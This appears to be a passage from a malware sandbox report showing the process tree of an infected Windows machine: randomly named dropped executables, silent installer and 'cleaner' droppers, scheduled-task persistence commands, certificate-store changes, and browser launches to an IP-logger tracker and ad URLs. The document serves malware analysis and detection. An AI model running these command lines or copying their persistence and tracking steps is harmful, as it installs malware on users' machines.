                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\h9qXJLEbV8pRQS5MPg58kADw.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\h9qXJLEbV8pRQS5MPg58kADw.exe"
                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                      PID:1188
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-LD7TG.tmp\h9qXJLEbV8pRQS5MPg58kADw.tmp
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-LD7TG.tmp\h9qXJLEbV8pRQS5MPg58kADw.tmp" /SL5="$1053E,506127,422400,C:\Users\Admin\Documents\h9qXJLEbV8pRQS5MPg58kADw.exe"
                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                        PID:7328
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-C1HBJ.tmp\Sharefolder.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-C1HBJ.tmp\Sharefolder.exe" /S /UID=2709
                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                            PID:9100
                                                                                                                                                                                                                                                                                            • C:\Program Files\Reference Assemblies\OCTJCKLXKU\foldershare.exe
                                                                                                                                                                                                                                                                                              "C:\Program Files\Reference Assemblies\OCTJCKLXKU\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                              PID:5960
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\86-58f3c-b3d-d7f9b-fe661bfec6a31\Katedupabe.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\86-58f3c-b3d-d7f9b-fe661bfec6a31\Katedupabe.exe"
                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                PID:8340
                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                    PID:8540
                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa4718
                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                        PID:6640
                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                        PID:12864
                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa4718
                                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                                            PID:11476
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a0-74d9d-b20-714ad-8cdaeff7c79af\Faevilyshutae.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a0-74d9d-b20-714ad-8cdaeff7c79af\Faevilyshutae.exe"
                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                          PID:6208
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nlp5szmz.x30\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                              PID:11116
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\nlp5szmz.x30\GcleanerEU.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\nlp5szmz.x30\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                                  PID:14748
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 14748 -s 244
                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                    PID:10904
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                  PID:14020
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\installer.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                    PID:14532
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633284578 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                      PID:11076
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slidtjp0.wr4\any.exe & exit
                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                    PID:14716
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\slidtjp0.wr4\any.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\slidtjp0.wr4\any.exe
                                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                                        PID:15064
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14chtr4o.zwo\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                        PID:15216
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\14chtr4o.zwo\gcleaner.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\14chtr4o.zwo\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                                                            PID:8168
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 8168 -s 244
                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                              PID:11884
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bgzbfj5i.fsw\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                          PID:3748
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                PID:2232
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                PID:4256
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\75lpt8hlC1NGZyE5J12J4MX_.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\75lpt8hlC1NGZyE5J12J4MX_.exe"
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                              PID:3600
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\FGP00Y3mTuq2surDBGCBZ2PR.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\FGP00Y3mTuq2surDBGCBZ2PR.exe"
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              PID:6096
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6096 -s 268
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                PID:5308
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\W5TmQT5ajJ9vWwg5m1wuKb6e.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\W5TmQT5ajJ9vWwg5m1wuKb6e.exe"
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                              PID:2796
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                          PID:4544
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1015b9a4e0b.exe
                                                                                                                                                                                                                                                                                                            Fri1015b9a4e0b.exe
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            PID:1172
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 300
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                              PID:5708
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                          PID:2592
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                                                                                            Fri106e757f6d75.exe
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            PID:3872
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              PID:5604
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exe
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              PID:5768
                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1h8Se7
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                PID:2112
                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa4718
                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                    PID:5880
                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                      PID:6792
                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                        PID:6864
                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                          PID:6856
                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                            PID:7152
                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                              PID:5864
                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                PID:6540
                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:1
                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                  PID:5144
                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                    PID:5472
                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:8
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                      PID:7232
                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                        PID:4940
                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5136 /prefetch:2
                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                          PID:9188
                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                            PID:7824
                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                              PID:7804
                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                PID:9460
                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7932
                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2828
                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                      PID:10960
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                              PID:4832
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1008c7d6874.exe
                                                                                                                                                                                                                                                                                                                                                Fri1008c7d6874.exe
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                PID:4768
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri103a7805577.exe
                                                                                                                                                                                                                                                                                                                                              4⤵
